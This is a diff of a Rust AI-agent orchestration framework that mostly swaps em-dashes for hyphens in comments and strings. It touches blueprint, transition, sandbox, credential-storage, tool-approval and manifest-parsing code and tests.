 /// (`resolve_transition_sync` returns `Choose`, and `build_transition_prompt`
 /// asks the model to name a stage). Without a `transition_prompt` the model gets
 /// only the bare stage names plus whatever `hint`s exist, and has to guess the
-/// selection criteria — so a branching stage must either explain the choice in a
+/// selection criteria - so a branching stage must either explain the choice in a
 /// prompt or label every branch with a hint.
 ///
 /// `allow_complete` stages are included: they reach the same lane with a single
@@ -387,7 +387,7 @@ fn branching_stages_explain_how_to_choose() {
             assert!(
                 stage.transition_prompt.is_some() || unlabeled.is_empty(),
                 "agent '{name}' stage '{}' branches to {choosable:?} but has no \
-                 transition_prompt, and {unlabeled:?} carry no hint either — the \
+                 transition_prompt, and {unlabeled:?} carry no hint either - the \
                  model is left to guess which branch to take",
                 stage.name
             );

--- a/crates/leviath-core/Cargo.toml
+++ b/crates/leviath-core/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [dependencies]

--- a/crates/leviath-core/src/blueprint.rs
+++ b/crates/leviath-core/src/blueprint.rs
@@ -72,7 +72,7 @@ pub struct Blueprint {
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub sandbox: Option<crate::sandbox::ToolSandboxConfig>,
 
-    /// Opt-in escape hatch (issue #97): when `true`, the agent may add tools to
+    /// Opt-in escape hatch: when `true`, the agent may add tools to
     /// its own `tools/` directory mid-run and have them re-discovered and
     /// re-advertised for its next turn. **Off by default** - tools are otherwise
     /// discovered once at spawn and an agent cannot grow its own toolchain.
@@ -1005,7 +1005,7 @@ impl StuckConfig {
 /// has been chosen but before its transform runs. A gate that isn't satisfied
 /// re-runs the stage with a `[System]` nudge instead of transitioning.
 ///
-/// The motivating case (issue #107): an agent that reads and reasons about the
+/// The motivating case: an agent that reads and reasons about the
 /// codebase entirely through `shell` and reaches the review stage without ever
 /// having called a file-writing tool, producing a run with no output at all.
 #[derive(Debug, Clone, Default, PartialEq, Eq, Serialize, Deserialize)]
@@ -1568,7 +1568,7 @@ mod tests {
 
     /// A `require_modifications` gate on a stage that can't modify anything
     /// could never be satisfied - it would just burn the stage's re-run budget
-    /// on every pass. Reject it at load time instead (issue #107).
+    /// on every pass. Reject it at load time instead.
     #[test]
     fn test_graph_validation_modification_gate_needs_a_writing_stage() {
         let gated = |tools: &[&str], extra: &[&str]| {

--- a/crates/leviath-core/src/blueprint.rs
+++ b/crates/leviath-core/src/blueprint.rs
@@ -11,7 +11,7 @@ use crate::lifecycle::CompactionConfig;
 use serde::{Deserialize, Serialize};
 use std::collections::HashMap;
 
-/// An agent blueprint — the complete definition of an agent type.
+/// An agent blueprint - the complete definition of an agent type.
 ///
 /// Includes stages, model selection, tools, AND context layout. A blueprint
 /// defines everything needed to instantiate and run an agent with specific
@@ -74,7 +74,7 @@ pub struct Blueprint {
 
     /// Opt-in escape hatch (issue #97): when `true`, the agent may add tools to
     /// its own `tools/` directory mid-run and have them re-discovered and
-    /// re-advertised for its next turn. **Off by default** — tools are otherwise
+    /// re-advertised for its next turn. **Off by default** - tools are otherwise
     /// discovered once at spawn and an agent cannot grow its own toolchain.
     #[serde(default)]
     pub dynamic_tools: bool,
@@ -230,7 +230,7 @@ impl Blueprint {
 
         let has_any_transitions = self.stages.iter().any(|s| s.transitions.is_some());
         if !has_any_transitions {
-            // Pure linear mode — no graph validation needed
+            // Pure linear mode - no graph validation needed
             return Ok(());
         }
 
@@ -262,7 +262,7 @@ impl Blueprint {
                 }
 
                 // A `require_modifications` gate on a stage that advertises no
-                // file-modifying tool can never be satisfied — it would just
+                // file-modifying tool can never be satisfied - it would just
                 // burn the stage's re-run budget every time.
                 for (target_name, edge) in transitions {
                     let Some(gate) = &edge.gate else { continue };
@@ -300,7 +300,7 @@ impl Blueprint {
         let has_terminal = self.has_terminal_path(&entry, &mut std::collections::HashSet::new());
         if !has_terminal {
             return Err(ValidationError::Graph(
-                "no terminal path exists from entry stage — agent would never complete".to_string(),
+                "no terminal path exists from entry stage - agent would never complete".to_string(),
             ));
         }
 
@@ -587,13 +587,13 @@ pub struct InteractionPoint {
 
     /// Directives keyed by option label.
     ///
-    /// When the user picks an option present in this map (e.g. "Revise — I'll
+    /// When the user picks an option present in this map (e.g. "Revise - I'll
     /// describe changes"), the mapped directive text is injected into the
     /// agent's conversation context and the stage re-runs inference IN-STAGE
     /// (bounded by a revision cap) instead of falling through to a stage
-    /// transition. The directive tells the agent what to do next — e.g. call
+    /// transition. The directive tells the agent what to do next - e.g. call
     /// `ask_user_text` to learn what to change, or `edit_document` to let the
-    /// user edit the plan directly — so the routing decision is deterministic
+    /// user edit the plan directly - so the routing decision is deterministic
     /// (code) while the actual input capture is an agent tool call.
     #[serde(default, alias = "followups")]
     pub directives: HashMap<String, String>,
@@ -608,14 +608,14 @@ pub struct InteractionPoint {
     /// Options that, when selected, open the stage's most recent output (e.g.
     /// the plan) in an editable field so the user can modify it directly. The
     /// engine issues the edit interaction itself and injects the edited text
-    /// back into context — deterministic, with no dependence on the model
+    /// back into context - deterministic, with no dependence on the model
     /// choosing to call an edit tool. Matched with the same normalization.
     #[serde(default)]
     pub edit_options: Vec<String>,
 
     /// Optional pinned region to hold this point's authoritative document (e.g.
     /// `"plan"`). When set, each time the point is presented the current
-    /// document — the produced text, or the user's direct edit — *replaces* that
+    /// document - the produced text, or the user's direct edit - *replaces* that
     /// region's content, so later revisions and downstream stages build on the
     /// current version rather than regenerating from the task. `None` ⇒ the
     /// document lives only in the rolling conversation / output.
@@ -689,7 +689,7 @@ pub struct Stage {
     pub accepts_messages: bool,
 
     /// Whether the LLM may end the run at this stage instead of naming a
-    /// transition target — e.g. a review stage that approves the work
+    /// transition target - e.g. a review stage that approves the work
     /// needs no further stage. When true, `prompt_llm_transition`'s query
     /// offers an explicit "DONE" response that resolves to a terminal
     /// (no-transition) outcome instead of forcing the single/first
@@ -697,7 +697,7 @@ pub struct Stage {
     #[serde(default)]
     pub allow_complete: bool,
 
-    /// Whether this stage may be used as a fan-out `worker_stage` — i.e. run as
+    /// Whether this stage may be used as a fan-out `worker_stage` - i.e. run as
     /// an in-process sub-agent worker entered at this stage. Off by default so a
     /// blueprint author must explicitly opt a stage in to being fanned into
     /// (you can only fan out into a stage designed for it).
@@ -720,7 +720,7 @@ pub struct Stage {
 
     /// Per-stage sandbox override. `None` inherits the agent-level
     /// `Blueprint.sandbox` (which in turn inherits the global default = host).
-    /// Set a tighter sandbox here to isolate a single stage — e.g. run analysis
+    /// Set a tighter sandbox here to isolate a single stage - e.g. run analysis
     /// on the host but implementation in a networkless container.
     #[serde(default)]
     pub sandbox: Option<crate::sandbox::ToolSandboxConfig>,
@@ -845,7 +845,7 @@ pub struct ModelConfig {
     pub parameters: HashMap<String, serde_json::Value>,
 
     /// Optional per-stage cap on the wall-clock time (in seconds) one inference
-    /// for this stage may run — the whole call including retries. When set, it
+    /// for this stage may run - the whole call including retries. When set, it
     /// overrides the default job timeout; when `None`, the default applies.
     ///
     /// This lets a stage with slow first-token latency (e.g. a large-prompt
@@ -958,7 +958,7 @@ pub struct TransitionEdge {
     pub gate: Option<TransitionGate>,
 
     /// Thresholds arming a [`TransitionCondition::Stuck`] edge. `Some` iff the
-    /// condition is `Stuck` — both the manifest parser and [`Blueprint::validate`]
+    /// condition is `Stuck` - both the manifest parser and [`Blueprint::validate`]
     /// reject the two half-configured shapes.
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub stuck: Option<StuckConfig>,
@@ -969,7 +969,7 @@ pub struct TransitionEdge {
 /// At least one threshold is always set: an edge with none could never fire, so
 /// both the manifest parser and [`Blueprint::validate`] reject that shape rather
 /// than build a dead edge. Every threshold is evaluated against the *current
-/// stage's* progress counters, which reset on each stage entry — so a blueprint
+/// stage's* progress counters, which reset on each stage entry - so a blueprint
 /// can arm different stages with different thresholds independently.
 #[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
 pub struct StuckConfig {
@@ -982,7 +982,7 @@ pub struct StuckConfig {
     pub after_minutes: Option<usize>,
 
     /// `stuck_after_same_file_edits`: `write_file`/`edit_file` calls against a
-    /// single path in this stage — the "100 iterations in the wrong file" mode.
+    /// single path in this stage - the "100 iterations in the wrong file" mode.
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub after_same_file_edits: Option<usize>,
 
@@ -1022,13 +1022,13 @@ pub struct TransitionGate {
 
     /// Region whose non-emptiness also satisfies the gate. Per-stage tool-call
     /// counters reset on stage entry and are not restored when a run resumes
-    /// after a daemon restart, but context regions are — so pointing the gate at
+    /// after a daemon restart, but context regions are - so pointing the gate at
     /// the region the write tools are routed into keeps a resumed run honest.
     #[serde(default)]
     pub region: Option<String>,
 
     /// Tool names counted as modifying beyond the built-in `write_file` /
-    /// `edit_file` — for agents whose writes go through MCP or script tools.
+    /// `edit_file` - for agents whose writes go through MCP or script tools.
     #[serde(default)]
     pub tools: Vec<String>,
 
@@ -1061,7 +1061,7 @@ pub enum TransitionCondition {
     /// LLM picks from available transitions (default for multi-transition stages)
     LlmChoice,
     /// Fires *mid-stage* when the stage's runtime metrics cross this edge's
-    /// [`StuckConfig`] thresholds — the agent is burning iterations, wall clock,
+    /// [`StuckConfig`] thresholds - the agent is burning iterations, wall clock,
     /// or edits to one file without finishing. Unlike every other condition this
     /// interrupts a stage the agent never said it had completed, so when the edge
     /// is unavailable the runtime resumes the stage rather than transitioning.
@@ -1184,15 +1184,15 @@ mod tests {
     fn agent_tool_permissions_projects_only_string_tool_perm_entries() {
         let stages = vec![Stage::new("plan".to_string(), make_model())];
         let mut bp = Blueprint::new("t".into(), "d".into(), stages, make_layout());
-        // A well-formed tool_perm string entry — included.
+        // A well-formed tool_perm string entry - included.
         bp.metadata.insert(
             "tool_perm:bash".to_string(),
             serde_json::Value::String("deny".to_string()),
         );
-        // A non-`tool_perm:` key — skipped (strip_prefix returns None).
+        // A non-`tool_perm:` key - skipped (strip_prefix returns None).
         bp.metadata
             .insert("title".to_string(), serde_json::Value::String("x".into()));
-        // A tool_perm key whose value isn't a string — skipped (as_str is None).
+        // A tool_perm key whose value isn't a string - skipped (as_str is None).
         bp.metadata
             .insert("tool_perm:weird".to_string(), serde_json::Value::Bool(true));
 
@@ -1205,7 +1205,7 @@ mod tests {
 
     #[test]
     fn test_blueprint_validate_runs_transform_validation() {
-        // A transform whose mapping targets a real region — validate() must
+        // A transform whose mapping targets a real region - validate() must
         // reach ContextTransform::validate() and succeed.
         let stages = vec![Stage::new("plan".to_string(), make_model())];
         let mut bp = Blueprint::new("t".into(), "d".into(), stages, make_layout());
@@ -1247,7 +1247,7 @@ mod tests {
     #[test]
     fn test_mixed_linear_and_graph_mode_terminal_path() {
         // "plan" has explicit transitions (triggers graph-mode validation),
-        // but "impl" and "review" have none — they must fall back to
+        // but "impl" and "review" have none - they must fall back to
         // linear (next-by-index) terminal-path resolution.
         let mut plan = Stage::new("plan".to_string(), make_model());
         let impl_stage = Stage::new("impl".to_string(), make_model());
@@ -1491,7 +1491,7 @@ mod tests {
 
     #[test]
     fn test_model_config_serde_defaults_when_fields_missing() {
-        // Minimal JSON — models defaults to empty, allow_user_default defaults to true
+        // Minimal JSON - models defaults to empty, allow_user_default defaults to true
         let json = r#"{"parameters": {}}"#;
         let mc: ModelConfig = serde_json::from_str(json).unwrap();
         assert!(mc.models.is_empty());
@@ -1567,7 +1567,7 @@ mod tests {
     }
 
     /// A `require_modifications` gate on a stage that can't modify anything
-    /// could never be satisfied — it would just burn the stage's re-run budget
+    /// could never be satisfied - it would just burn the stage's re-run budget
     /// on every pass. Reject it at load time instead (issue #107).
     #[test]
     fn test_graph_validation_modification_gate_needs_a_writing_stage() {
@@ -1736,7 +1736,7 @@ mod tests {
 
     #[test]
     fn test_linear_stages_still_validate() {
-        // No transitions set at all — pure linear mode
+        // No transitions set at all - pure linear mode
         let stages = vec![
             Stage::new("plan".to_string(), make_model()),
             Stage::new("impl".to_string(), make_model()),
@@ -2151,7 +2151,7 @@ mod tests {
 
     /// Blueprint: fan_out stage (worker_stage=fix_worker) → merge → terminal.
     /// The merge stage carries an (empty) transitions table so the blueprint is
-    /// in graph mode — this makes `validate_graph` run `has_terminal_path`,
+    /// in graph mode - this makes `validate_graph` run `has_terminal_path`,
     /// which walks the fan-out stage's merge hand-off.
     fn fanout_blueprint(worker_allowed: bool, config: FanOutConfig) -> Blueprint {
         let mut fan = Stage::new("parallel".to_string(), make_model());

--- a/crates/leviath-core/src/cache.rs
+++ b/crates/leviath-core/src/cache.rs
@@ -9,7 +9,7 @@ use serde::{Deserialize, Serialize};
 /// Cache hint for a region or message boundary.
 #[derive(Debug, Clone, Copy, PartialEq, Serialize, Deserialize)]
 pub enum CacheHint {
-    /// Always cache -- content never changes (pinned, system, tools, compact history).
+    /// Always cache - content never changes (pinned, system, tools, compact history).
     Always,
     /// Cache until content hash changes (compacting regions between compaction events).
     UntilChanged,

--- a/crates/leviath-core/src/credentials.rs
+++ b/crates/leviath-core/src/credentials.rs
@@ -2,19 +2,19 @@
 //!
 //! Two backends, chosen at runtime by `[security] credential_store`:
 //!
-//! - **`file`** (the default) — provider API keys sit in `~/.leviath/config.toml`
+//! - **`file`** (the default) - provider API keys sit in `~/.leviath/config.toml`
 //!   and MCP OAuth tokens in `~/.leviath/mcp-auth.json`, both written `0600` by
 //!   `leviath_sys::write_private` so they are never briefly world-readable. This
 //!   is what Claude Code and Codex do, and it is a reasonable default: it works
 //!   headless, in containers, over SSH, and on a CI runner, none of which have
 //!   an unlocked keychain.
-//! - **`keychain`** — the OS credential store. Secrets never touch disk in
+//! - **`keychain`** - the OS credential store. Secrets never touch disk in
 //!   Leviath's own files, so a stolen `~/.leviath` directory yields nothing, and
 //!   on macOS the OS gates access per-application.
 //!
 //! `file` stays the default deliberately. A keychain that is unavailable is not
-//! a degraded experience, it is a broken one — every inference fails with no
-//! obvious cause — and the environments where Leviath is most useful are exactly
+//! a degraded experience, it is a broken one - every inference fails with no
+//! obvious cause - and the environments where Leviath is most useful are exactly
 //! the ones least likely to have a working credential store. Opting in is one
 //! line; being unable to opt out would be a support burden.
 //!
@@ -87,7 +87,7 @@ pub trait CredentialStore: Send + Sync {
     /// Every one of `accounts` that is present, with its secret.
     ///
     /// The OS stores offer no portable "list everything under this service"
-    /// operation, so the caller supplies the accounts to look for — it knows
+    /// operation, so the caller supplies the accounts to look for - it knows
     /// them: the provider list is fixed and the MCP server list comes from the
     /// config.
     ///

--- a/crates/leviath-core/src/interaction.rs
+++ b/crates/leviath-core/src/interaction.rs
@@ -34,7 +34,7 @@ pub enum BodyFormat {
     /// Plain text body (no special rendering).
     #[default]
     Plain,
-    /// Markdown body — rendered via the dashboard's markdown renderer.
+    /// Markdown body - rendered via the dashboard's markdown renderer.
     Markdown,
 }
 
@@ -182,7 +182,7 @@ impl InteractionRequest {
     /// Create a new tool-approval request.
     /// The part of a tool call a person needs to see before approving it.
     ///
-    /// "Allow tool call: `bash`?" is not a question anyone can answer — it asks
+    /// "Allow tool call: `bash`?" is not a question anyone can answer - it asks
     /// whether to run *a shell command* without saying which one, so the only
     /// safe answer is no and the only practical one is yes. The argument that
     /// decides the answer is the command itself, and for the file tools it is
@@ -218,7 +218,7 @@ impl InteractionRequest {
     ) -> Self {
         let tool = tool_name.into();
         let prompt = match Self::approval_detail(&tool, &arguments) {
-            Some(detail) => format!("Allow tool call: `{tool}` — {detail}?"),
+            Some(detail) => format!("Allow tool call: `{tool}` - {detail}?"),
             None => format!("Allow tool call: `{tool}`?"),
         };
         Self {
@@ -332,7 +332,7 @@ mod tests {
     use super::*;
 
     /// "Allow tool call: `bash`?" asks whether to run a shell command without
-    /// saying which one — the only safe answer is no and the only practical one
+    /// saying which one - the only safe answer is no and the only practical one
     /// is yes, so in practice everything gets approved unread.
     #[test]
     fn a_tool_approval_says_what_it_is_asking_about() {
@@ -828,7 +828,7 @@ mod tests {
 
     #[test]
     fn test_default_true_via_serde_missing_required_field() {
-        // JSON without `required` — should default to true via default_true()
+        // JSON without `required` - should default to true via default_true()
         let json = r#"{
             "id": "dt1",
             "kind": "free_text",

--- a/crates/leviath-core/src/layout.rs
+++ b/crates/leviath-core/src/layout.rs
@@ -14,8 +14,8 @@ use serde::{Deserialize, Serialize};
 ///
 /// Blueprint authors think in **proportions** (`budget = "35%"`) so their intent
 /// stays correct regardless of the model's context size, while power users can
-/// still pin an exact count. The percentage denominator — the model's context
-/// window — is not known at parse time, so the spec is stored unresolved here and
+/// still pin an exact count. The percentage denominator - the model's context
+/// window - is not known at parse time, so the spec is stored unresolved here and
 /// turned into a concrete token count at window-build time (see
 /// [`BudgetSpec::resolve`] and [`ContextLayout::resolved`]).
 #[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
@@ -52,7 +52,7 @@ impl BudgetSpec {
     ///
     /// Surrounding whitespace is trimmed and decimals are allowed (`"0.6%"`).
     /// Rejects a missing `%`, a non-numeric value, and anything outside the
-    /// `(0, 100]` range — a single region can't sensibly claim ≤0% or more than
+    /// `(0, 100]` range - a single region can't sensibly claim ≤0% or more than
     /// the whole window (region budgets may *sum* past 100%, but each is a
     /// fraction of one window). Returns the human-readable reason on failure so
     /// the caller can surface it at load time.
@@ -76,7 +76,7 @@ impl BudgetSpec {
     /// Resolve this spec to a concrete token count against a model context
     /// `window`.
     ///
-    /// [`Absolute`](BudgetSpec::Absolute) ignores the window (idempotent — a
+    /// [`Absolute`](BudgetSpec::Absolute) ignores the window (idempotent - a
     /// fully-absolute layout resolves to itself). [`Percent`](BudgetSpec::Percent)
     /// rounds `window * percent`, then applies the `max` cap, then the `min`
     /// floor. The floor is applied **last** so that when `min > max` the floor
@@ -106,7 +106,7 @@ impl BudgetSpec {
 
 /// A ContextLayout defines the complete memory map for an agent.
 ///
-/// Like SNES VRAM layout — every region has a defined purpose, size, and policy.
+/// Like SNES VRAM layout - every region has a defined purpose, size, and policy.
 /// The layout specifies:
 /// - Which regions exist and their configurations
 /// - Total token budget across all regions
@@ -178,7 +178,7 @@ impl ContextLayout {
 
         // Warn if sum of max tokens exceeds budget (not necessarily an error,
         // since not all regions will be full simultaneously)
-        // Warn if no SlidingWindow region exists — agents should have a
+        // Warn if no SlidingWindow region exists - agents should have a
         // conversation region for typed message entries, but some agents
         // (e.g., deep-researcher) use other region kinds exclusively.
         let has_sliding_window = self
@@ -187,14 +187,14 @@ impl ContextLayout {
             .any(|r| matches!(r.kind, RegionKind::SlidingWindow { .. }));
         if !has_sliding_window {
             tracing::warn!(
-                "Layout has no SlidingWindow region — typed conversation entries require one"
+                "Layout has no SlidingWindow region - typed conversation entries require one"
             );
         }
 
         // The token-sum warning and the fixed-working-budget hard error below
         // operate on concrete `max_tokens` values. When percentage budgets are
         // present those values are provisional placeholders until the layout is
-        // resolved against a model window, so the checks are meaningless here —
+        // resolved against a model window, so the checks are meaningless here -
         // skip them and rely on the post-resolution `validate()` call at spawn.
         if self.has_percent_budgets() {
             return Ok(());
@@ -256,7 +256,7 @@ impl ContextLayout {
     const MIN_WORKING_TOKENS: usize = 8000;
 
     /// The working-budget floor is only enforced when the layout's total budget
-    /// is at least this large — i.e. it's a realistically-sized agent, not a
+    /// is at least this large - i.e. it's a realistically-sized agent, not a
     /// toy/illustrative layout where an absolute floor wouldn't make sense.
     const BUDGET_CHECK_MIN_TOTAL: usize = 20_000;
 
@@ -364,7 +364,7 @@ impl ContextLayout {
 /// by the run's caller (a CLI `--<name>` flag, an ACP `---region:<name>---`
 /// marker, or the API `regions` map); the remaining variants are resolved by the
 /// daemon from the run's workdir (which is why this type only *declares* the
-/// source — `leviath-core` stays filesystem-agnostic; resolution lives in the
+/// source - `leviath-core` stays filesystem-agnostic; resolution lives in the
 /// CLI daemon's spawner).
 #[derive(Debug, Clone, PartialEq, Serialize, Deserialize)]
 #[serde(rename_all = "snake_case")]
@@ -400,7 +400,7 @@ pub enum RegionSeed {
     /// The combined stdout/stderr of a shell command run in the workdir at spawn.
     ///
     /// Unlike every other variant this *executes* something, and it does so
-    /// before the first inference — so before any tool-approval prompt. The
+    /// before the first inference - so before any tool-approval prompt. The
     /// daemon runs it inside the entry stage's sandbox when one is configured,
     /// caps its runtime and output, and honours the `[security]
     /// allow_seed_commands` kill switch. A failure is non-fatal unless the
@@ -475,7 +475,7 @@ impl RegionDefinition {
     ///
     /// The `budget` is set to [`BudgetSpec::Absolute`] holding `max_tokens` and
     /// `compact_at` to `None`, so every existing caller (and every region without
-    /// a percentage budget) is unaffected — resolving such a layout is a no-op.
+    /// a percentage budget) is unaffected - resolving such a layout is a no-op.
     pub fn new(name: String, kind: RegionKind, max_tokens: usize) -> Self {
         Self {
             name,
@@ -660,7 +660,7 @@ mod tests {
     #[test]
     fn test_validate_warns_but_does_not_error_when_max_tokens_exceed_budget() {
         // Sum of region max_tokens (5000 + 10000 = 15000) exceeds the total
-        // budget (10000) — this should only warn, not fail validation, since
+        // budget (10000) - this should only warn, not fail validation, since
         // not all regions are full simultaneously.
         let regions = vec![
             RegionDefinition::new("a".to_string(), RegionKind::Pinned, 5000),
@@ -975,7 +975,7 @@ mod tests {
     #[test]
     fn validate_skips_token_checks_for_percent_layouts() {
         // A percentage layout whose provisional max_tokens are tiny/zero must not
-        // trip the fixed-working-budget hard error — that check is deferred to
+        // trip the fixed-working-budget hard error - that check is deferred to
         // post-resolution. Wrap in tracing so no warn-arg lines read uncovered.
         let regions = vec![
             RegionDefinition::new("big_pinned".to_string(), RegionKind::Pinned, 0).with_budget(

--- a/crates/leviath-core/src/manifest.rs
+++ b/crates/leviath-core/src/manifest.rs
@@ -82,7 +82,7 @@ pub fn parse_manifest(content: &str) -> Result<Blueprint> {
                 }
 
                 // Backward compat: old single-model format (provider + model at
-                // top level) or old fallbacks list — treat both as models entries.
+                // top level) or old fallbacks list - treat both as models entries.
                 if models.is_empty() {
                     if let Some(provider) = mt.get("provider").and_then(|v| v.as_str()) {
                         let model_name = mt
@@ -203,7 +203,7 @@ pub fn parse_manifest(content: &str) -> Result<Blueprint> {
                                     .unwrap_or_default();
                                 // Per-option directives, keyed by option label:
                                 // [stages.<name>.interaction_points.directives]
-                                // "Revise — I'll describe changes" = "Call ask_user_text ..."
+                                // "Revise - I'll describe changes" = "Call ask_user_text ..."
                                 // `followups` is accepted as a backward-compat alias.
                                 let pt_directives: std::collections::HashMap<String, String> = pt
                                     .get("directives")
@@ -218,7 +218,7 @@ pub fn parse_manifest(content: &str) -> Result<Blueprint> {
                                     })
                                     .unwrap_or_default();
                                 // Options that immediately abort the run:
-                                // abort_options = ["Abort — cancel this run"]
+                                // abort_options = ["Abort - cancel this run"]
                                 let pt_abort_options: Vec<String> = pt
                                     .get("abort_options")
                                     .and_then(|v| v.as_array())
@@ -229,7 +229,7 @@ pub fn parse_manifest(content: &str) -> Result<Blueprint> {
                                     })
                                     .unwrap_or_default();
                                 // Options that open the last output for direct editing:
-                                // edit_options = ["Add detail — expand a section"]
+                                // edit_options = ["Add detail - expand a section"]
                                 let pt_edit_options: Vec<String> = pt
                                     .get("edit_options")
                                     .and_then(|v| v.as_array())
@@ -330,7 +330,7 @@ pub fn parse_manifest(content: &str) -> Result<Blueprint> {
             if model_has_system_prompt {
                 tracing::warn!(
                     "stage '{stage_name}': `system_prompt` is nested under \
-                     [stages.{stage_name}.model] and will be IGNORED — move the \
+                     [stages.{stage_name}.model] and will be IGNORED - move the \
                      `system_prompt = \"\"\"...\"\"\"` line ABOVE the \
                      [stages.{stage_name}.model] table so it belongs to the stage"
                 );
@@ -432,7 +432,7 @@ pub fn parse_manifest(content: &str) -> Result<Blueprint> {
             }
 
             // Parse per-stage context layout: [stages.<name>.context.regions].
-            // Different stages can carry different region sets — the runtime swaps
+            // Different stages can carry different region sets - the runtime swaps
             // to a stage's layout on entry (apply_stage_context → apply_layout),
             // preserving overlapping regions' content by name. Absent ⇒ the stage
             // inherits the global [context.regions] layout. NOTE (TOML nesting):
@@ -506,7 +506,7 @@ pub fn parse_manifest(content: &str) -> Result<Blueprint> {
                     if !is_stuck && stuck.is_some() {
                         return Err(Error::Other(format!(
                             "transition to '{target_name}' sets stuck_after_* thresholds \
-                             but its condition is not 'stuck' — they would never be read"
+                             but its condition is not 'stuck' - they would never be read"
                         )));
                     }
 
@@ -780,8 +780,8 @@ fn str_field(v: &toml::Value, key: &str) -> String {
 /// Parse a transition edge's `stuck_after_*` thresholds into a [`StuckConfig`],
 /// or `None` when the edge arms none of them.
 ///
-/// Non-positive values read as unset — mirroring `enforce_max_iterations`, where
-/// `max == 0` means "unlimited" — so `stuck_after_iterations = 0` leaves the edge
+/// Non-positive values read as unset - mirroring `enforce_max_iterations`, where
+/// `max == 0` means "unlimited" - so `stuck_after_iterations = 0` leaves the edge
 /// unarmed and the caller rejects it, rather than the edge firing on turn zero.
 fn parse_stuck_config(edge: &toml::Value) -> Option<StuckConfig> {
     let threshold = |key: &str| {
@@ -835,7 +835,7 @@ fn parse_region_mapping(v: &toml::Value) -> RegionMapping {
 /// (compact at that fraction of the resolved budget) and/or an absolute
 /// `threshold_tokens` cap. Percentage regions carry a provisional `max_tokens`
 /// (the cap, or 0) that is finalized when the layout is resolved against a model
-/// window at spawn — see [`ContextLayout::resolved`]. The returned total sums
+/// window at spawn - see [`ContextLayout::resolved`]. The returned total sums
 /// only the absolute maxes; percentage regions contribute at resolution time.
 ///
 /// Malformed `budget`/`compact_at` strings are a hard error so `leviath validate`
@@ -1096,7 +1096,7 @@ fn parse_transition_gate(table: &toml::value::Table) -> crate::blueprint::Transi
             .filter_map(|v| v.as_str().map(|s| s.to_string()))
             .collect();
     }
-    // A negative budget is a typo, not "never hold the stage" — fall back to the
+    // A negative budget is a typo, not "never hold the stage" - fall back to the
     // default rather than silently disabling the gate.
     if let Some(max) = table
         .get("max_attempts")
@@ -1453,7 +1453,7 @@ stuck_after_minutes = -5"#,
         );
     }
 
-    /// Thresholds under any other condition would silently never be read — the
+    /// Thresholds under any other condition would silently never be read - the
     /// classic "I forgot `condition = \"stuck\"`" footgun.
     #[test]
     fn parse_manifest_rejects_stuck_thresholds_without_the_stuck_condition() {
@@ -2539,7 +2539,7 @@ mode = "autonomous"
     #[test]
     fn parse_manifest_security_block_without_taint_tracking_defaults_true() {
         // A present `[security]` block that omits `taint_tracking` keeps the
-        // default (true) — block presence implies intent to configure security.
+        // default (true) - block presence implies intent to configure security.
         let toml = r#"
 [agent]
 name = "sec-default"
@@ -2744,8 +2744,8 @@ mode = "autonomous"
         let transitions = bp.find_stage("a").unwrap().transitions.as_ref().unwrap();
         // An edge with no `gate` table has no gate at all.
         assert!(transitions["b"].gate.is_none());
-        // A gate whose every key is the wrong type — including a negative
-        // attempt budget — falls back to the defaults, i.e. a gate that blocks
+        // A gate whose every key is the wrong type - including a negative
+        // attempt budget - falls back to the defaults, i.e. a gate that blocks
         // nothing rather than one that silently never holds.
         let gate = transitions["c"].gate.as_ref().unwrap();
         assert_eq!(gate, &crate::blueprint::TransitionGate::default());
@@ -2956,7 +2956,7 @@ mode = "interactive"
         let inter = bp.find_stage("inter").unwrap();
         assert_eq!(inter.mode, StageMode::Interactive);
 
-        // Default mode (no mode specified) — Autonomous
+        // Default mode (no mode specified) - Autonomous
         let default = bp.find_stage("default_mode").unwrap();
         assert_eq!(default.mode, StageMode::Autonomous);
     }
@@ -3003,7 +3003,7 @@ mode = "autonomous"
     // The "plan" stage's plan_approval interaction point lets the user pick
     // Approve / Revise / Add detail / Abort. If "plan" only has a single
     // outgoing transition edge, resolve_transition() auto-follows it without
-    // ever consulting the LLM — so anything other than "Approve" is silently
+    // ever consulting the LLM - so anything other than "Approve" is silently
     // ignored and the run proceeds to "implement" anyway. Guard against that
     // regressing by requiring at least two outgoing edges (forcing the
     // LLM-consultation path in resolve_transition / prompt_llm_transition).
@@ -3043,7 +3043,7 @@ mode = "autonomous"
     /// Runtime-fired edges (`error`, `stuck`) are exempt, and deliberately so: a
     /// gate answers "did you do any work before leaving?", which only makes sense
     /// for a voluntary exit. Gating an escape hatch would send a failed or
-    /// looping agent back into the stage it is failing in — a stuck agent is not
+    /// looping agent back into the stage it is failing in - a stuck agent is not
     /// helped by being told to write more (issue #106).
     #[test]
     fn shipped_coding_agents_gate_every_non_error_implement_edge() {
@@ -3119,9 +3119,9 @@ mode = "autonomous"
 
         // Planning must NOT be able to end the run. Abort is the engine's path
         // (abort_options on the plan_approval point), so `allow_complete` was
-        // only ever a way for the model to stop early — and it did: one that had
+        // only ever a way for the model to stop early - and it did: one that had
         // created a file during `discover` read it back here, decided "already
-        // created — no further action is needed", and completed without ever
+        // created - no further action is needed", and completed without ever
         // reaching `implement`, taking the user's plan correction with it.
         assert!(!plan.allow_complete);
         // Every way out leads somewhere that does the work.
@@ -3164,7 +3164,7 @@ mode = "autonomous"
         assert!(!approval.directives.contains_key(&detail));
         // "Abort" is a deterministic abort option.
         assert!(approval.abort_options.contains(&abort));
-        // "Approve" is a plain completing option — none of the above.
+        // "Approve" is a plain completing option - none of the above.
         assert!(!approval.directives.contains_key(&approve));
         assert!(!approval.abort_options.contains(&approve));
         assert!(!approval.edit_options.contains(&approve));
@@ -3176,7 +3176,7 @@ mode = "autonomous"
         let bp = parse_manifest(manifest_content).unwrap();
         let review = bp.find_stage("review").unwrap();
 
-        // review stage must allow_complete — an approving review has no real
+        // review stage must allow_complete - an approving review has no real
         // next stage and must not be forced back into 'implement'.
         assert!(review.allow_complete);
 
@@ -3205,7 +3205,7 @@ mode = "autonomous"
